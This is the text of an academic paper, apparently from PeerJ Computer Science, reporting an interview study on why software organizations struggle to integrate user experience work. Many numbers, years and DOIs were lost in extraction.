dissatisfaction does not necessarily lead to satisfaction and pleasure. through being holistic, ux addresses both satisfiers kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
(e.g., fulfilled needs, emerging emotions) and dissatisfiers (e.g., usability or technical problems) (hassenzahl, ). therefore to a large extent, the implications of being worthwhile overlap the implications of its holistic nature. software organizations often face various challenges when dealing with quality characteristics. berntsson svensson et al. ( ) found that if practitioners lack understanding and knowledge about software quality characteristics, they tend to undervalue, and ignore these characteristics during development. berntsson svensson et al. ( ) also report that practitioners are more likely to dismiss those characteristics that are considered less important, e.g., usability is more dismissed than performance. karlsson et al. ( ) show that functional issues are often perceived to be more important than quality issues. based on their findings, practitioners find it difficult to deal with the dependencies between quality requirements and the functionality or other characteristics of the system. limited knowledge and awareness has also been reported as one of the challenges to usability work (rosenbaum, rohn & humburg, ). bak et al. ( ) report that developers’ minds are set more on the programming aspect of the product than its usability, and they often misunderstand the term ‘‘usability evaluation’’ and often relate it to functionality. gulliksen et al. ( ) report that limited awareness in different levels of organizations, in particular at the management level, can lead to down-prioritizing usability. they therefore suggest increasing knowledge and awareness about usability among different stakeholders and in various levels of organizations, in particular among management. other studies show that, in general, practitioners find it more difficult to perform requirements and testing activities for quality characteristics than for functionality (paech & kerlow, ; berntsson svensson et al., ; chung & do prado leite, ). for instance, it is generally more difficult to document quality requirements in a measurable way, or handle their dependencies to functional requirements (berntsson svensson et al., ; karlsson et al., ; borg et al., ; nuseibeh & easterbrook, ). borg et al. ( ) report that lack of competencies to handle quality characteristics in projects often leads to ignoring related requirement in projects. even if these requirements are properly quantified (specified in a measurable manner), they require suitable competencies to be tested and verified. similar problems have also been discussed in the usability literature. practitioners find it challenging to document measurable usability requirements (cajander, lárusdóttir & gulliksen, ; gulliksen et al., ). ardito et al. ( ) showed that if practitioners fail to include usability in requirements documents, these requirements might be ignored later in testing. the limited access to competencies and unclear responsibilities are also reported as challenges to better usability work. for instance, rosenbaum, rohn & humburg ( ) report that lack of usability professionals is one of the main obstacles organizations face concerning usability. boivie, gulliksen & göransson ( ) show that even in cases when organizations have access to the right expertise, usability professionals are not sure about their responsibilities, and are uncertain as to how to contribute to the projects. chamberlain, kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
sharp & maiden ( ) report that power struggles rise as designers within a project defend their discipline in response to the decisions made by developers, and vice versa. despite the differentiation of ux and usability, only a limited number of empirical studies have so far analyzed the implications of these differences. one example is the study by vermeeren et al. ( ) that compares the challenges of evaluating usability and ux. they argue that some of ux evaluation methods need to be further improved and developed for better use in practice. according to vermeeren et al., there is still a lack of suitable methods for evaluating ux in earlier development phases or in the period before actual use (i.e., anticipated use). they also highlight that current methods are not often practical because they need special expertise, are time consuming, or their data analysis is hard. similarly, isomursu et al. ( ) discuss that practitioners face difficulties in ux work compared to usability work because they do not have access to tools and methods to objectively measure ux. law, van schaik & roto ( ) explore the basic question of whether ux elements are measurable. they report that their interviewees expressed skepticism and ambivalence towards specific ux measures even if attitudes were more positive overall. they note that practitioners show opposing views on whether ux can or should be divided into composing elements, or whether it needs to be considered or measured as a whole. results from their interviews show three categories of challenges concerning the interplay between ux evaluation and software development: (i) theoretical (measuring ux holistically or in elements, and conceptualizing long-lasting versus momentary experience), (ii) methodological (differing preferences for quantitative versus qualitative data by design- and engineering-oriented stakeholders), and (iii) practical (lack of knowledge and competencies for interpreting measurement outcomes). the participants in the law et al.’s study emphasized they need to use a variety of media (e.g., video, tv, social media) to develop the required prototypes for measuring ux and that they often even need more than one such prototype to gather enough input for design. their practitioners also argued that ux measures are essentially prone to fading and fabrication, or that there is a lack of means to measure the exact emotion of users at each moment (law, van schaik & roto, ). the work of law, van schaik & roto ( ) is duplicated in the context of the latin american software development industry by gerea & herskovic ( ). they conclude that practical aspects such as cost and time play a more important role in whether or not practitioners measure ux. other challenges reported by gerea et al. include: limited access to the end users, and lack of knowledge and experience in ux measurement similar to what vermeeren et al. ( ) found. alves, valente & nunes ( ) investigated how ux evaluation is performed in practice (i.e., by whom, in what phases of software development, and using what tools and methods). according to their data, in around % of the cases ux evaluation is performed without involving the end users, and often evaluators ‘assume’ what the perception of users will be. alves, valente & nunes ( ) also report that sometimes evaluations are performed by software developers that do not necessarily have the required competencies. also, often tools and methods are selected based on cost rather than suitability for the project. alves el al. 
used a list of evaluation tools and methods that are mainly usability-specific and kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. see http://www.allaboutux.org for more ux-specific tools and methods. here, we use the terms ‘ux practitioner’ and ‘non-ux practitioners’ to respectively refer to practitioners who have ux- related roles and responsibilities in the organizations and those who do not. lack ux-specific methods (e.g., attrakdiff questionnaire (hassenzahl, burmester & koller, ) ). this can introduce a risk to their data because practitioners might have preferred the use of a generic method such as a questionnaire for evaluating ux, without necessarily acknowledging that such generic methods may purely produce usability-related data if not used with specific attention to ux-related concepts, such as the non-tasks-related aspect of use (hassenzahl, diefenbach & göritz, ). studies also show that the perception of ux is generally different in academic and industrial contexts. väänänen-vainio-mattila, roto & hassenzahl ( ) report that practitioners still focus more on functionality and usability issues in their ux work. similarly, in kuusinen & väänänen-vainio-mattila’s ( ) study in a large software organization, ease of use and efficiency were the most often reported sources of good ux. hence, these studies conclude that while academia concentrates more on the hedonic aspect, the industry focuses more on the pragmatic aspect. as we saw, those studies that explicitly take differences between ux and usability into account, mainly focus on evaluation activities and the role of ux measures in challenges practitioners face. they therefore do not sufficiently discuss other aspects of ux work, for instance requirements or communication and collaboration between ux and non-ux practitioners. in addition, those studies that report software organizations often focus more on usability than ux rarely provide an explanation for this lopsided focus. hence, there is a need for further empirical studies that investigate the role of ux characteristics and differentiate ux from other software quality characteristics including usability. our study is a response to this research gap. methods we have conducted an explorative, qualitative study (braun & clarke, ) to investigate the challenges to integrating ux practices into software development processes. below, we detail our research approach by describing the different companies where we conducted interviews, how the data was collected, and our approach to data analysis. research sites we selected a variety of companies with different characteristics for our study in order to improve the generalizability of our findings (runeson & höst, ). table shows an overview of these companies and their main characteristics and labels them (a–h) for easier reference later in the paper. the companies span various domains (company type) and vary in size (number of employees). we approached both consultancy and product development companies in order to cover both perspectives. both a and e are well-known consultancy companies in sweden, while b, c, d, and h are well-known product development companies in sweden. throughout the study, we were introduced to additional companies by our interviewees, and we also included a number of interviewees from those companies (f and g). company f is an international consultancy company, also active in sweden. company g is an american company. 
only one of the companies (e) was previously known to the authors based on previous research collaborations. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.allaboutux.org https://peerj.com http://dx.doi.org/ . /peerj-cs. table overview of the companies that participated in the study. company type number of employees (a) it services, consultancy & outsourcing > , (b) defense & security ∼ , (c) wireless solutions & network testing ∼ , (d) systems & software development company ∼ (e) user experience consultancy & training ∼ (f) it & management consultancy > , (g) user experience & usability consultancy (h) telecommunication ∼ , table the interviewees who participated in this study. code roles & responsibilities field of education industrial experience (since) a- business developer, ux lead & interaction designer cartoonist a- interaction designer & ux designer computer science & interaction design a- project leader & developer computer science a- art director & graphical designer photography b- software engineer & project manager psychology & electrical engineering b- technical product manager computer science b- senior project manager computer science b- product manager & project manager computer science b- technical project manager & requirements analyst computer science b- system developer & interaction designer computer science & interaction design c- ux lead & interaction designer cognitive science d- system developer & requirements analyst computer science e- business developer, ux lead & interaction designer software engineering f- ux lead & human factors specialist cognitive science g- manager, design strategist & ux lead design h- manager, design strategist & ux designer multimedia & interaction design h- ux designer multimdeia & design data collection the aim of the interviews was presented to our main contacts in each company to assure selected interviewees were suitable for our research. the selected practitioners (see table ) represent technical (e.g., developers), design (e.g., interaction designers), and management roles. we had the option to ask for more interviewees, but since the study was explorative, after interviews we were confident that we had covered the major challenges from a sufficiently broad range of perspectives. we conducted semi-structured interviews (flick, ) to collect more of the interviewees’ viewpoints, which was important to the explorative nature of our study. the questions covered different phases of development processes, and also the concept of ux and how it differed from usability in the interviewee’s eye. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. transcribing the interviews segmenting the interview transcripts e.g. initial codes: - ux vs. usability - motives - definition - tools and methods identifying the key points in each segment coding the segments conducting the interviews data collection data analysis creating the initial set of codes creating the interview guide literature review formulating the research question preparation creating new codes categorizing the coded segments creating the themes a segment per row in the excel file coding was performed in an excel file: each row was coded, using separate codes in different columns excel macros were used to generate separate sheets for each code from different interview transcripts challenge code key point interview transcript theme levels of data abstraction figure process of data gathering and analysis. 
full-size doi: . /peerjcs. /fig- we prepared an interview guide with a set of pre-designed questions based on the knowledge gained from literature. in each interview, questions were rephrased, added, or skipped based on the interviewee’s background and responses. each interview covered all phases of software development, the activities performed in each phase, and the tools and methods applied. thirteen of the interviews were conducted face-to-face, and four via video or telephone conference. each interview lasted between – min, and was recorded and transcribed. the interviews were all performed in the spring of . data analysis figure provides an overview of the data gathering and analysis process. we applied thematic analysis as described in braun and clarke (braun & clarke, ) to encode and analyze the interview data. we segmented the interview transcriptions into meaningful paragraphs or sentences in a way that each of these segments presented one concept. we then coded these segments (braun & clarke, ). we used microsoft excel to document the coded data. each interview transcript was recorded in a separate sheet. segments of this transcript was recorded in separate rows, and different codes were assigned to each segment in separated kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. columns, following that segment. after coding, categories of challenges, i.e., themes, emerged as we put together similar concepts presented in the coded segments. a mind-map of challenges and categories was created to better identify and visualize the relations. we created a pilot list of codes (braun & clarke, ) that was iteratively refined. the initial codes captured challenges and their context and included: definition, challenges, solutions, tools and methods, evaluations, requirements, ux versus usability, and activities. as the interviewees mentioned various challenges, we asked follow-up questions to better understand attempted solutions, or previous experiences with usability or other quality characteristics in relation to similar challenges. when the interviewees used different terminologies, or had limited knowledge concerning ux or usability, we mapped their statements to the relevant concepts based on the definitions of the concepts in literature. for instance this statement: ‘‘there is a bit of confusion in the field and in the company as well, what’s the difference? design is design’’ (a- ) mapped to these key points: definition of ux is not clear, and practitioners do not know what ux exactly means. this statement was then coded as ‘challenge’, and ‘definition’. segments that related to understanding and definition of ux, such as this example, resulted in the theme ‘lack of consensus on definition and construct of ux’. threats to validity threats to validity are outlined and discussed based on the classification by runeson and höst (runeson & höst, ): selection process of subjects for interviews can cause a threat to construct validity. selection bias is always present when subjects are not fully randomly sampled. however, our subjects were selected based on their role, experience and availability so there is little more we could do to alleviate this threat. the presence of a researcher may influence the behavior and response of the subjects. this threat was alleviated somewhat by the guarantee of confidentiality of the data but is an inherent limitation of the research method used. 
in any empirical study, incorrect data is a threat to internal validity. interviews were audio recorded to mitigate this threat. the authors also analyzed the material in several rounds of independent as well as joint sessions to gradually reach consensus on the intended meaning of the respondents. we also shared the results of our analysis with the interviewees to validate and confirm the findings. external validity concerns the ability to generalize the results beyond the actual study. since the interviews are just a sample from a potentially very large population, they should be interpreted with some caution. we sampled a number of different organizations in different industrial domains to decrease the effect of this threat. in addition, the majority of the organizations we studied are swedish (exceptions are g (american), and f (dutch)), and the culture of swedish software industry can have an impact on how the studied organizations perceive and address ux or other quality characteristics. this distribution however is not sufficient to draw any conclusions based on the cultural differences of these companies, and in interpretation of findings this matter needs to be taken into consideration. qualitative studies rarely attempt to generalize beyond the actual setting and are more concerned with explaining and understanding the phenomena under study. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on definition & construct of ux theme : lack of consensus on the value of ux theme : low industrial impact of ux models, tools & methods theme : focus on objectively measurable aspects of software theme : difficulties in engineering ux-related requirements theme : focus on evaluating functionality & usability, not ux theme : lack of consensus on ux related competencies & responsibilities theme : communication & collaboration gap between ux & non-ux practitioners themes of challenges more tactical more fundamental inclu des explains figure the identified themes of challenges. full-size doi: . /peerjcs. /fig- another concern is that our data gathering was performed in the spring of . therefore, our data may not reflect today’s ux state-of-practice in the studied organizations. however, the data is valid when interpreted in its own time frame. also, to minimize the effect of the time frame on our analysis, we have included recent studies published since when discussing the results. another threat concerns reliability, the extent to which the data and analysis are dependent on the specific researchers. although the coding process is performed by the first author, to improve reliability of the generated themes, the three authors individually and independently conducted a pilot coding of these segments using an initial coding guide as explained above. the outcomes of the pilot coding were discussed in several sessions with all three authors, and the differences in coding were analyzed and resolved. also, we had carefully designed the interviews before running them. we also defined the coding process after the interviews and before analyzing the data. the initial codes were therefore identified mainly based on observed interview responses. we also ensured the themes are not imposed on the data rather emerged from it. results this section presents eight themes of challenges that emerged from the interview data (see fig. ). these themes are described and supported by the interviewees’ quotations. 
each quotation is provided with the interviewee’s code, and labeled either ‘se’ or ‘hci’ to reflect the community to which the interviewee belongs. this helps better understanding of the current state of practice from these two perspectives. theme . lack of consensus on definition and construct of ux our data shows that practitioners’ understanding of the concept of ux differs and is, in some cases, even inconsistent and contradictory (see fig. ). according to the respondents, ux is a new concept and there is a lack of general agreement on its meaning in the field in kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on definition & construct of ux practitioners have different understandings of ux practitioners have inconsistent & contradictory views on ux customers have limited knowledge about ux there is a lack of consensus on meaning of ux both in research & practice ux is seen as equal to usability or ixd includes figure challenges concerning definition and construct of ux (theme ). full-size doi: . /peerjcs. /fig- general, and among practitioners within organizations in particular. in some practitioners’ view, ux is the same as usability or interaction design (ixd) despite the fact that ux includes the user’s subjective perception and overall experience. the lopsided focus on usability and ixd can be explained by their relative simplicity: ‘‘i think discussions at large when it comes to ux design at common ground is still about ixd and usability. usability is easy to talk about and everybody understands it.’’ (a- /hci). one of the interviewees referred to ux as ‘‘just another buzz word’’ (e- /hci). in her view, ux contains the same concepts that have been around for a long time under other names such as usability and emotional design. on the other hand, some practitioners explicitly differentiated between ux and usability. one of the participants emphasized that usability is ‘‘a minor subset of ux’’ and added: ‘‘i’ve never, ever called myself a usability expert, and i would never do that.’’ (h- /hci). similarly, another practitioner stressed that ux is not about ixd and has a much broader perspective: ‘‘[ixd] is just the end results, we do not call ourselves interaction designers, because that is only % of our work but that is an important element because that is the most visual part of our work .’’ (f- /hci). similarly, another practitioner referred to ux as: ‘‘a wholeness with the emotional, social, economical, functional, and technical parts.’’ (a- /hci). another practitioner described ux as: ‘‘pretty much everything that affects a user’s interaction with a product.’’ (h- /hci). he further emphasized ux is ‘‘the whole package’’ and usability is only one part of it. a number of practitioners stated that ux is a ‘broad’ and ‘holistic’ concept covering not only the user perspective, but also the business perspective. while the latter looks into how the design contributes to achieving business goals, the former assures satisfying the end users’ needs. the user perspective includes aspects such as ‘emotions’, ‘values’ and ‘preferences’. some practitioners related ux to the ‘why’ behind the functional requirements and the software in general. for instance, one practitioner described this through three main questions of ‘what’ to build, ‘how’ to build it, and ‘why’ to build it (a- /hci). 
some practitioners related ux to the gui by stating that it is about "the cool things, the new things, the flashy things." (a- /se). in their view, ux is mainly about emotions and aesthetics and therefore not applicable to all types of applications, for instance 'productivity applications'. in general, the practitioners with technical backgrounds showed limited knowledge about ux. their knowledge was often limited to cognitive aspects of design, i.e., usability. one of the technical managers stated: "[our customers] talk about increased workload. that is a negative thing. i don't know if that qualifies as ux." (b- /se). on the other hand, a ux practitioner emphasized that ux "goes beyond cognitive aspects of design" (e- /hci), the main focus of usability.

the participants also discussed that customers' limited knowledge about ux is a challenge. customers who have heard about ux can be too ambitious regarding emotional and non-task-related user needs. customers' limited knowledge also means that they often specify the related requirements vaguely, using inconsistent and subjective terminology. they often indicate a need for quality characteristics such as 'cool', 'fun', or 'high-tech' mostly because they are affected by such 'buzz words' while they do not necessarily know what these terms actually mean. practitioners emphasized that to prevent misunderstandings, ux-related requirements should be refined early on into concrete requirements and specified in a measurable way. regarding this, one of the interviewees said: "usually they say 'we want something like that app', 'we want it to be cool and high tech'. then you have to initiate a dialog to find out what that means for this particular customer." (a- /hci).

theme 2. lack of consensus on the value of ux

figure: challenges concerning value of ux (theme 2).

generally speaking, our data shows that various stakeholders have different views on whether ux is important or not (see fig. ). a group of the interviewees believed the ux of software is increasingly important because of the growing general importance of software in recent decades. interactions users had with earlier software were limited to the command line, and software was mainly built to support existing manual work. software is now a large part of life, and users are exposed to a variety of interaction styles (mouse, touch, etc.) and experiences. this exposure to various software systems affects the experience and expectations of users. regarding this, one practitioner said: "users are meeting a lot of good things, and they are expecting good things all the time." (e- /hci). according to the practitioners, various businesses are learning from successful products in the market. this has inspired not only market-driven but also business-to-business software projects.
this is supported by one of the interviewees saying: "a lot of business-to-business applications are being informed by business-to-consumer apps." (g- /hci). in particular, in cases where a product has competitors, the motivation to improve ux increases. one of the practitioners argued that ux is now a 'differentiator': "today i think that many companies do usable products, in order to distinguish a brand or a product we need to add an extra level to the product so that is really what i call ux. we need to take more things into account, e.g., emotions, and that it needs to look great, and it is not only about being usable." (a- /hci). in market-driven products, branding, emotional concerns, and relations with end users are important. therefore, in our participants' views, these businesses are often more concerned about ux. another interviewee argued that for market-driven software, in particular game development, ux is "part of the common practice" (a- /hci), while this is not the case for business-to-business software. he further emphasized that this approach of market-driven projects should be "transferred to other projects" as well.

some of the practitioners emphasized that ux is an important software quality characteristic that needs to be taken into account more in projects. however, in some functionality-focused organizations, ux is considered something "on the side" and not a core concept or value. according to these practitioners, the business units often focus on functionality and not ux. as one of the interviewees emphasized, in this case the business unit is not "that concerned with the look and feel" (a- /hci). the practitioners were generally positive that more and more organizations, even the technology-focused ones, are learning about ux and the importance of taking it into account in their products. for instance, one practitioner said that in their company, business units now show less resistance towards ux and the importance of ux "starts to be visible" (h- /hci) to these units. in addition, the interviewees emphasized that managements' preferences, values, and motivations also influence ux work in organizations. regarding this, one practitioner stated: "i think it's sometimes just the reason people go into business in the first place ...the people who are in it because they think that their product or service solves a real problem, they generally care about ux more." (g- /hci). this interviewee further discussed how individuals, in particular higher management, play an important role in whether ux is a priority in an organization or not. one of the interviewees stated that the inputs from their ux group in research and development are ignored by business units because some of the ideas are ahead of their time while these units tend to focus on the near future: "business units are occupied with their very close, near time results so they look at what they can sell now." (h- /hci). he further highlighted that some of these previously rejected ux ideas are now being incorporated in the products and are getting support from management because competitors now implement similar ideas.

another challenge is that customers often resist taking on the costs of performing ux work. in practitioners' view, customers are often not aware of ux and its value, and in particular how it differs from usability and ixd.
regarding difficulties in convincing customers, a practitioner said: "it can be hard ...if you have to have three weeks extra to make the graphics work in a certain way, they might think it's unnecessary. and maybe the software's going to work fine, but if they made these extra efforts or put in this extra amount of money, they would have actually gone much, much further maybe." (a- /hci). as a way to convince customers to agree to the cost of ux practices, one of the organizations (a) uses examples of successful products in the market that are known for their good ux (e.g., apple). another organization (f) uses fixed prices for their projects so that practitioners can freely spend part of the budget on ux practices. some practitioners emphasized that they talk about ux 'indirectly'. they connect ux to business goals, and argue for ux from the point of view of business success, not the end users. an interviewee motivated this by saying: "if you start babbling about usability and strange kind of things, they will say 'oh! i don't want to pay for this'." (e- /hci). according to some practitioners, ux practices should be sold to the customer as part of the contract to assure coverage of the associated costs. this requires showing how such practices will add value to the software and have a return on investment (roi) for the customer. nevertheless, presenting an roi is often difficult. this is illustrated by a ux practitioner who said: "i don't think you can put roi into a proposal necessarily. i think that's irresponsible, frankly. because % of the time, we don't understand the true and false nature of an issue when we're writing a proposal. it's only after working with a client for a little bit of time that we begin to see the nuance there. that usually undercuts any kind of understanding that's used to generate proposed improvements in roi, for example." (g- /hci).

theme 3. low industrial impact of ux models, tools and methods

we identified a number of challenges concerning how practitioners apply ux theories, tools and methods (see fig. ). we observed that practitioners' knowledge regarding ux is often based on experience and work with similar concepts, not on any specific ux models or theories. some practitioners had formal training in usability and ixd and used that foundation to build ux skills over time in an ad hoc way. for instance, one of the practitioners stated: "when i first started in the s, there was no such thing as ux or ixd, actually ... [then] it has been ixd and then sort of merged into ux design." (h- /hci). in general, the interviewees were not familiar with currently popular approaches to ux and corresponding models, even those interviewees that demonstrated a relatively good understanding of ux. one interviewee (a- /hci) stated that she handles users' emotions, values, etc. 'in a non-academic way'; another interviewee (a- /hci) said that the way she handles ux is not formal or 'by the book'. the practitioners generally showed a positive attitude towards applying new models, tools, methods and techniques in their work: "we are lacking this, so this would be really nice to have more research results that we could apply." (a- /hci). however, organizations often resist introducing new models, tools, methods, or techniques. hence, in the studied organizations, practitioners often rely only on traditional interview and observation techniques in their work with ux.
the interviewees referred to two models they use in their ux work: 'emotional design' by donald norman and maslow's hierarchy of human needs. the latter is used as an inspiration when eliciting user needs. the interviewees mentioned that such models can help create a methodology to work with ux and "build the right things in the right order" (f- /hci). respondents with this type of experience were a clear minority.

figure: challenges concerning industrial impact of ux theories (theme 3).

theme 4. focus on objectively measurable aspects of software

figure: challenges concerning subjective aspects of software (theme 4).

another identified theme of challenges concerns how the studied organizations handle subjective aspects of software (see fig. ). a group of practitioners emphasized that the software development and engineering community has traditionally had a much greater focus on software functionality. one practitioner stressed the relation between functionality and ux as follows: "the quality of experience is really depending to some extent on how the functional requirements are met, but also actually on what the functional requirements are, also just the amount of them." (h- /hci). this interviewee further emphasized: "for us, technology is the material that we can shape in order to create experiences." the interviewees emphasized that satisfying functional requirements does not necessarily mean that the software includes correct or valuable functionality. this is evidenced by one interviewee saying: "what do you know when you have signed [the technical specification]? do you know that it is a good solution? no! you only know that it meets the functional requirements and to me it is silly!" (e- /hci). in addition, the participants believed that the software community often focuses more on 'actual' than 'perceived' quality characteristics of software.
while the former concerns objectively measurable quality characteristics, the latter concerns how users subjectively perceive these qualities. for instance, users may perceive a response time of ms (i.e., actual performance) as fast or slow (i.e., perceived performance). regarding the role of perceived qualities in the experience of users, an interviewee stated: "sometimes the perception of time is more important than the actual time, and these are the things you should pinpoint [to the stakeholders]." (e- /hci).

theme 5. difficulties in engineering ux-related requirements

figure: challenges concerning requirements work (theme 5).

another identified theme of challenges concerns handling ux in requirements work (see fig. ). according to the practitioners, in many cases the non-task-related needs of users (i.e., their be-goals) or their emotions are either neglected or treated only informally: "we'd specify this more in the persona descriptions; for example that this persona needs to, or wants to experience some kind of things. in the wireframes, we might specify an animation for example that it should feel smooth or something like that." (a- /hci). for instance, in one of the organizations, emotional design goals are often only documented and communicated in the form of a "post-it note on the wall", as a reminder. the interviewee emphasized that this approach is not optimal and that there is a need for more formal approaches to deal with such requirements: "it should be good if we could formalize it a little bit more i think." (a- /hci). the practitioners highlighted that it is an open problem how to map these types of needs to measurable requirements. for instance, one of the interviewees stated: "i would say the emotional part of this is very very rarely formally put into words." (a- /hci). in particular, when the software product is innovative, these problems are compounded. this is evidenced by an interviewee saying: "this is a kind of project where nobody really can tell how this should be, what it should be like, nobody has done it before, there are no standards to refer to ...who can specify those [ux-related] requirements?
you need to have a certain quality but what is the suitable level of that quality? we haven't really found what that level is." (b- /se).

the practitioners generally agreed that to communicate ux-related requirements, they require forms other than text (e.g., sketches, wireframes). they emphasized that "concrete and tangible" forms can facilitate communicating these intangible and abstract requirements, and ensure that be-goals as well as do-goals are taken into consideration. regarding this, an interviewee told us: "we create 'mood boards' where you take an image-driven approach to the look and feel, and we use references of course, like 'that app has a good flow in it', and 'that app has a good feeling to it'." (a- /hci). practitioners with technical backgrounds also seemed to have a similar approach to ux-related requirements: "if the customer said that they want it to 'look nice', then you have to make the graphical design first and then they can say 'hey! this looks nice' and then you have taken care of that requirement." (a- /se). it is important that these non-textual ux-related requirements (e.g., wireframes) are traceable to other requirements. regarding this, a practitioner stated: "at the end we show the wireframes with all kinds of numbers and those numbers are linked to the excel sheets of the requirements, their descriptions and how they are linked with the cpr and business case." (f- /hci). practitioners related these problems to a lack of competence in dealing with ux-related requirements within their organizations: "i think it is largely a competence thing. doing emotional aspects of design is quite a new concept, i have only heard about it in the last year, or last two years maybe, so i do not think that knowledge has really reached the industry yet." (a- /se).

ux practitioners believed that handling functionality is comparatively easy and straightforward. regarding this, one practitioner highlighted: "features are what most project managers, most managers can understand. you can count them, you can map them to customers, customer dialog for instance, and so forth, and you can compare your amount of features with the competitors...when it comes to both features and user experience requirements—features are a bit easier to define somehow, because you can say things like, 'right, we need an email component with this capability'" (h- /hci). as another example, an interviewee stated: "functional requirements are easy to create, to merge into a design; more emotional things are more difficult." (f- /hci). ux practitioners argued that ux-related requirements should be elicited before refining functional requirements. for instance, one interviewee stated: "first you have to define the business requirements, the user requirements, the ixd, then you can define the functional requirements." (e- /hci). another practitioner said: "i think that the functional requirements should come as a result of a dialog between different types of domains such as user experience, business, and technology." (h- /hci). nevertheless, according to these practitioners, such an approach is not common in practice. this is in line with the view of practitioners with technical backgrounds, who believe the requirements process should start by first eliciting and refining functional requirements and then quality requirements.
some practitioners highlighted the challenge of finding a balance between ux-related needs, business goals, and technological constraints. regarding the importance of finding a balance between emotional and business needs, one of the interviewees stated: "you can spend a lot of time, thinking about people's emotions and so on, but if you are going to succeed you have to look at the business perspective." (e- /hci). in addition, according to the interviewees, while customers should be involved to assure alignment of projects with business perspectives, the end users should be involved to assure alignment with ux-related needs, and practitioners need to find a balance between these needs. as an example, an interviewee stated: "we can buy the best camera in the world, users will have a better image quality than they have in reality but it is too expensive today, ....that ruins the business case for that customer" (b- /se).

we observed some inconsistencies in practitioners' views concerning user involvement. in favor of involving users, an interviewee stated: "maybe you want to have the end user involved also with the developers so that developers understand what they are doing, instead of just following the specifications. i think that would be very very valuable." (a- /se). on the other hand, a project manager stated that involving users in requirements discussions increases the costs of the projects; therefore, it is better to negotiate requirements and sign a contract without involving the users. regarding this, an interviewee stated: "[they] think they can say anything during the [requirement] workshop and then get it. it is not the case... so it leads to lots of long long long discussions afterwards." (b- /se). as another example: "it usually leads to features that you take on more than what you agreed from the beginning. so it's possible that the customer gets a better system but they still don't pay you more money for this." (b- /se). one developer stated that they often have less access to the end users, which can be problematic for their work, mainly because this means developers often do not understand the rationale for the requirements: "developers don't get the motivation behind the requirements because that gets lost during the way. so, the marketing people say that we must have this requirement, and interaction designers say we must do it this way, so you have the 'what' and the 'how' but you never get the 'why'." (a- /se). some practitioners emphasized that relying too much on the end users' opinions might lead to less creativity in the design work: "we have a quote sitting on the wall here, it's from henry ford [that says] 'if i had asked people what they wanted, they would have said a faster horse'." (h- /hci).

theme 6. focus on evaluating functionality and usability, not ux

we also identified a number of challenges regarding the evaluation of ux in the studied organizations (see fig. ). our data shows that, in general, the selected organizations mainly focus on testing functionality. in addition, similar to the previous theme on requirements, the interviewees highlighted that limited involvement of the end users in projects is a challenge to evaluating ux, especially since evaluating ux requires gathering users' subjective perception of the software. we observed that practitioners with technical backgrounds are often unfamiliar with how their organizations handle ux or even usability testing.
they also showed limited knowledge as to why such evaluations can contribute to the success of the software.

figure: challenges concerning testing and evaluation (theme 6).

generally speaking, ux evaluation is immature in the studied organizations. in projects with limited time or budget, ux evaluation is either non-existent or rare, especially when compared to other testing activities: "we have done much functional testing of course, system tests etc., but end user testing we have not performed much i'd say." (a- /hci). in some organizations, ux evaluation is basically replaced by usability testing. regarding this, one interviewee stated: "i think user tests tend to be more focused on pure usability. i guess it's when you're releasing the product into the wild, that's when you start to get maybe the most valuable feedback or the most truthful ones." (a- /hci). according to these practitioners, usability testing is not enough to evaluate the whole ux of the software. regarding this, a ux practitioner stated: "when you evaluate usability, it's when you go into the nitty gritty details, and try to look at efficiency within the user interface. my personal view is that that is not that relevant. i mean it's relevant but not in what we do [i.e., ux]." (h- /hci). to compensate for limited formal ux evaluations, some practitioners gather informal qualitative user feedback after release, for instance through comments in the app store or on social media.

according to the practitioners we spoke with, ux evaluation is limited because it is difficult compared to evaluating usability or other quality characteristics. some practitioners related this difficulty to the fact that ux involves emotions and non-task-related user needs (i.e., be-goals), and that limited tools and methods exist to support addressing these needs in evaluations. emotions can even be impossible to measure using current quantitative approaches, as one of the practitioners stated: "it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end.
if we had a method or approach to really get these from the user that would be great." (a- /hci). similarly, one interviewee said: "some goals are more difficult to measure than others, e.g., if this is a feeling thing: 'i should be very well informed', but mostly you can measure [them] in the usage test through observations and interviews" (e- /hci). this practitioner further emphasized that they can specify quantitative measures for ux-related requirements (e.g., " out of users should succeed, and they should be content"), but also need to observe users in order to gain a better understanding of the experience: "can the users perform the tasks? how do they perform the tasks? how do they feel afterwards? are they content?" (e- /hci). this interviewee further emphasized that to measure the feelings of users they need 'a rather complete prototype'. practitioners highlighted that despite the importance of involving the end users in ux evaluations, it is difficult to access them: "i think we should involve the end users a lot more but it is a political issue, the project needs to convince the customer that this is necessary." (a- /hci).

some of the interviewees related the difficulty in ux evaluation to the holistic nature of ux. discussing cases where practitioners take a holistic approach to ux, one interviewee stated: "how would you measure that sort of holistic experience throughout the process of designing it? because, of course you cannot [implement or design] everything at the same time, and you know there are so many dependencies. how do you straighten those out and how do you understand what you're measuring and not measuring?" (h- /hci). this interviewee further emphasized that the broader scope of ux negatively impacts evaluations: "evaluation is a problem of course, cause user experience is much broader in scope than usability, it's more difficult to evaluate also. like the phone example that i gave you before, how do you pick up on the fact that someone has experienced the competition unless you ask for it? can you count on what a person would actually say about their experience? what if the person doesn't say anything? that's a problem, of course, because ux is much broader in scope, and if you have a wider scope on it, then you have a much more difficult task to actually frame it in an evaluation phase." (h- /hci).

